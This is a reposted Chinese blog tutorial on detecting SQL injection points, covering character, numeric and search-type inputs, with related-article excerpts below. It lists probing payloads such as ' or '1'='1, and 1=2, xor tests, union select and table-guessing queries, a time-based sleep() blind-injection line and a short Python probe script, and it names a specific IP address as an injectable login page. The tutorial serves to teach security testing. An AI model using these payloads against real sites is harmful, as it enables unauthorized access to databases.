sql注入点的判断

最新推荐文章于 2025-05-28 16:41:00 发布
转载 最新推荐文章于 2025-05-28 16:41:00 发布 · 1.3k 阅读 · 14
文章标签:

#sql注入

本文详细介绍如何通过单引号、and、or及xor等方法判断网站是否存在SQL注入漏洞,包括字符型、数字型和搜索型输入域的测试策略,以及如何构造测试预期结果变种。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最为经典的单引号判断法: 在参数后面加上单引号,比如:

http://xxx/abc.php?id=1'

如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。

输入域的值为字符型

  ‘and '1'='1 和 ’and '1'='2来判断
  http://xxx/abc.php?id= x' and '1'='1 页面运行正常,继续进行下一步。          
  http://xxx/abc.php?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。

构造测试                            预期结果                                 变种
a'                      //触发错误,返回数据库错误                              
a' or '1'='1            //永真条件,返回所有记录                   a') or ('1'=1   
a' or '1'='2            //空条件,返回原来相同结果                  a') or ('1'=2
a' and '1'='2           //永假条件,不返回记录                      a') and ('1'='2
  • 1
  • 2
  • 3
  • 4
  • 5

输入域的值为数字型

用1=1,1=2法

若满足条件,则存在SQL注入漏洞,程序没有对提交的整型参数的合法性做过滤或判断

    http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。
    http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。

构造测试                            预期结果                                 变种
'                       //触发错误,返回数据库错误                  
1+1                     //返回原来相同的结果                           3-1
1+0                     //返回原来相同的结果                     
1 or 1=1                //永真条件,返回所有记录                        1) or (1=1
1 or 1=2                //空条件,返回原来相同的结果                     1) or (1=2
1 and 1=2               //永假条件,不返回记录                          1) and (1=2
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
1.单引号判断
    http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。

2.and判断
    http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页
    http://www.xxx.com/xxx.asp?id=10'and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。

3.Or判断(OR是提交返回正确有注入点)
    http://www.xxx.com/xxx.asp?id=10'or 1=1
    http://www.xxx.com/xxx.asp?id=10'or 1=2

4.xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)
    http://www.xxx.com/xxx.asp?id=10'xor 1=1
    http://www.xxx.com/xxx.asp?id=10'xor 1=2

5.加减号数字判断(加上-1,返回错误页面,则也表示存在注入漏洞.)
    http://www.xxx.com/xxx.asp?id=10-0
    http://www.xxx.com/xxx.asp?id=10-1
    http://www.xxx.com/xxx.asp?id=10+1

6.输入框判断
    可以使用特殊符号去判断
    #@!$/ ...

http://120.24.86.145:9001/sql/
登录框注入,使用#,--都无效,但是使用\报错,这时候上sqlmap,发现可以注入。

输入域的值为搜索型

  在输入框输入%'and '1'='1' and '%'='
            %'and '1'='2' and '%'='
两次查询出来的结果不相同,那么就可以确定存在注入了。

服务端返回错误形式

 1. 错误直接回显在页面上
 2. 错误隐藏在页面源代码中
 3. 检测到错误跳转到另一个页面
 4. 返回HTTP错误代码500或重定向302
 5. 适当处理错误结果,常显示一个通用错误页面
SQL注入类型判断
m0_56578216的博客
09-14 1615
第一关注入一个1’,错误回显出下面内容,其中1’是注入的内容,0,1后面的单引号和最前面的单引号是一对,剩下的两个单引号是一对,错误回显出上面内容说明是字符型注入注入一个id=2-1回显内容依然相同,说明这关的后端代码将2-1先进行算术运算后才接收,所以回显内容无变化,注入一个id=2-1回显内容改变,说明这关的后端代码将2-1当做字符串处理,才改变了回显内容,
网络安全——sql注入判断
W981113的博客
01-03 3958
?可以传递参数 sql数值型注入 1.判断注入点 ​ 数值型注入: ?id=1 and 1=1 , ?id=1 and 1=2 ​ 语句:select * from 表名 where id=1 and 1/2 2.猜字段数(二分法) ​ ?id=1 order by x 3.确定显示位 ​ ?id=-1 union select 1,2,3,4 --
SQL注入语句大全-.判断有无注入点
04-21
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称
SQL注入各类型 讲解及利用 (一)
lendq的Blog
05-07 1万+
简介: SQL注入漏洞产生的原因 SQL Injection 程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患 用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作 SQL语句 Structured Query Language 结构化的查询语言,是关系型数据库通讯的标准语言。 查询:SELECT st...
sql注入基础
最新发布
2301_77457568的博客
05-28 1055
sql注入原理:网站数据过滤不严格,过分信赖用户输入的数据, 没有过滤用户输入的恶意数据,无条件的把用户输入的数据当作SQL语句执行,因此导致sql注入漏洞产生。有无闭合字符 :数字型、字符型数据传输方式:post类型、get类型注入方式:联合查询注入、报错型注入、布尔型盲注、时间型盲注、宽字节注入宽字节注入:有些waf会在我们的提交数据前会被加入\,\的编码为%5c,我们在后面加上%df后变为了%df%5c,变成一个繁体汉字運,变成了一个有多个字节的字符。因为用了gbk编码。
SQL注入点判断注入方式
HMX404的博客
09-20 1万+
SQL注入类型 一,判断注入点 当参数可控时,看参数是否对数据产生影响,若有影响则可能是注入点。 输入SQL看是否可以产生报错,通过报错信息得到数据库部分语句。 利用引号、双引号、圆括号进行报对。 二,注入方式 get注入 在get传参时写入参数,将SQl语句闭合,后面加写入自己的SQL语句。 ?id=1‘order by 3 #判断有几列利用排序报错,超出列数报错。 ?id=1' union select 111,222,333 #显示回显点。 ?id=1' union select 111,us
SQL注入注入点判断
谢公子的博客
07-26 4133
本文是介绍如何判断某一处是否存在SQL注入,话不多说,直接开干。 第一处测试是sql-libs的Less-1,这是一个字符型注入的题目。 后台的SQL语句是 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 我们设置 id=1 后面的字符为测试点 进行模糊测试 ...
sql注入基础-如何判断 Sql 注入点+实例说明
m0_60884805的博客
10-11 8330
可能存在注入的url形式:http://xxx.xxx.xxx/abcd.php?id=XXX判断sql注入1.判断此url是否存在sql注入2.若存在sql注入,属于那种? 数字型判断: 可以使用经典的 and 1=1and 1=2 来判断. url中输入?id=1 and 1=1 页面依旧正常运行,继续下一步. url中输入?id=1 and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入
sql注入基础-如何判断 Sql 注入点+实例说明_sql注入判断注入点类型(1)
2303_79055586的博客
05-13 1043
可能存在 Sql 注入攻击的 ASP/PHP/JSP 动态网页中,可能有一个或多个参数,有时是整数型,有时是字符型,不能一概而论。当输入 and1='2时,后台执行 Sql 语句:select * from where id = ‘x’ and1='2’语法正确,但逻辑判断错误,所以返回异常。当输入 and1='1时,后台执行 Sql 语句:select * from where id = ‘x’ and1='1’语法正确,逻辑判断正确,所以返回正确。
SQL注入之如何检测与判断详细过程
01-31
SQL注入仍然是Web安全领域的一个重要威胁,了解并掌握如何检测和判断SQL注入点对于安全工程师来说至关重要。本文详细介绍了从初步判断到深入检测的全过程,希望可以帮助读者更好地理解SQL注入的原理,并能够在实际...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
Java面试题解析之判断以及防止SQL注入
08-28
Java面试题解析之判断以及防止SQL注入 Java防止SQL注入是目前软件开发中非常重要的一个安全问题,SQL注入攻击是目前黑客最常用的攻击手段,它的原理是利用数据库对特殊标识符的解析强行从页面向后台传入,改变SQL...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1724
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
SQL注入-注入点判断
热门推荐
渗透笔记
01-11 2万+
1.注入点判断 传入SQL语句可控参数分为两类 1. 数字类型,参数不用被引号括起来,如?id=1 2. 其他类型,参数要被引号扩起来,如?name="phone" 判断某个链接是否存在SQL注入,可以通过对其传入的可控参数进行简单的构造,通过服务端返回的内容来判断有无注入 其他类型 构造测试 预期结果
SQL注入点判断及万能密码
zhhhb1005的博客
04-10 3158
SQL注入漏洞的类型 1.单引号判断 http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。 2.and判断 http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页 http://www.xxx.com/xxx.asp?id=10'and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。 3.Or判断(or跟and判断方法不...
SQL注入点判断
孤的博客
04-02 5866
分类 1、常见的sql注入按照参数类型可分为两种:数字型和字符型。 当发生注入点的参数为整数时,比如 ID,num,page等,这种形式的就属于数字型注入漏洞。同样,当注入点是字符串时,则称为字符型注入,字符型注入需要引号来闭合。 2、也可以根据数据库返回的结果,分为回显注入、报错注入、盲注。 回显注入:可以直接在存在注入点的当前页面中获取返回结果。 报错注入:程序将数据库的返回错误信息直接显示在...
sql注入判断技巧
u012080723的专栏
12-01 633
对于数值型: 1.常用的一条time based盲注语句:     http://www.xxx.com/index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109)) 这条语句是猜解user()第二个字符的ascii码是不是109,若是109,则页面加载将延迟。它: 1) 既没有用到逗号、大小于符号 2) 也没有使用空格 却可以
Sqli 注入点解析
谢公子的博客
08-25 4881
目录 Less-1: 字符型注入 Less-2: 数字型注入 Less-3: 单引号字符型+括号 Less-4: 双引号字符型+括号 Less-5: 单引号字符型+固定输出信息 (floor报错注入&盲注) Less-6: 双引号字符型+固定输出信息 Less-7: 写入文件 Less-8: Boolean型盲注 Less-9: 延时注入 先附上sqli的源代码:链接:...
SQL注入1)--判断是否存在SQL注入漏洞
qq_51550750的博客
02-14 9552
什么是SQL注入 不论是学习后端开发/数据库/网络安全,SQL注入安全隐患反复被提起 到底什么是SQL? 维基百科的定义: (1)什么是SQLSQL是用来操控数据库的语言 (2)举一个例子,现在我们要查询电影“长津湖”的票房数据: 先想象一下开发人员是如何书写代码从数据库中拿到数据的: 作为一名黑客如何思考? SQL注入靶场练习- DVWA(1) 【1】首先将security调为low: (记住要点击“submit”) 【2】然后挑战模块SQL Injection 首先尝试正常的 【
判断sql注入点
03-08
### 如何确定SQL注入点 在Web应用程序中,任何地方如果允许用户输入并将其作为参数传递给SQL查询而未经适当验证或转义,则可能成为SQL注入点。通常情况下,这些位置包括但不限于表单提交、URL中的GET请求参数以及HTTP头信息。 对于具体的检测方法: - **手工测试**:通过向潜在的入口点(如登录框、搜索栏等)输入特殊字符组合来观察响应行为的变化可以初步判断是否存在SQL注入风险。例如尝试使用 `' OR '1'='1` 或 `admin' --` 这样的字符串看是否会绕过身份认证或者返回异常的结果集[^1]。 - **自动化扫描工具**:利用专门设计用于发现Web应用安全缺陷的软件来进行全面审查也是一种有效手段。这类工具能够自动探测网站上的各种交互接口,并模拟多种类型的攻击模式以识别出易受攻击之处[^5]。 为了更精确地定位到实际存在的SQL注入点,还需要考虑以下几个方面: #### 数据库驱动程序的选择 当采用PHP Data Objects (PDO) 扩展时,由于它支持预处理语句功能,因此即使用户提供了恶意构造的内容也会被当作纯粹的数据对待而不影响原有命令结构的安全性;相反如果没有启用此特性则更容易遭受此类威胁[^3]。 #### 输入源多样性 除了常规的HTML页面元素外,还需注意那些隐藏于HTTP协议内部的信息也可能成为突破口,比如Cookie值、Referer地址甚至是自定义Header字段都可能是隐患所在[^4]。 ```python import requests def test_sql_injection(url, param_name): payload = {param_name: "' OR '1'='1"} response = requests.get(url, params=payload) if "error in your SQL syntax" in response.text.lower(): print(f"[!] Potential SQL Injection found at parameter '{param_name}'!") ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值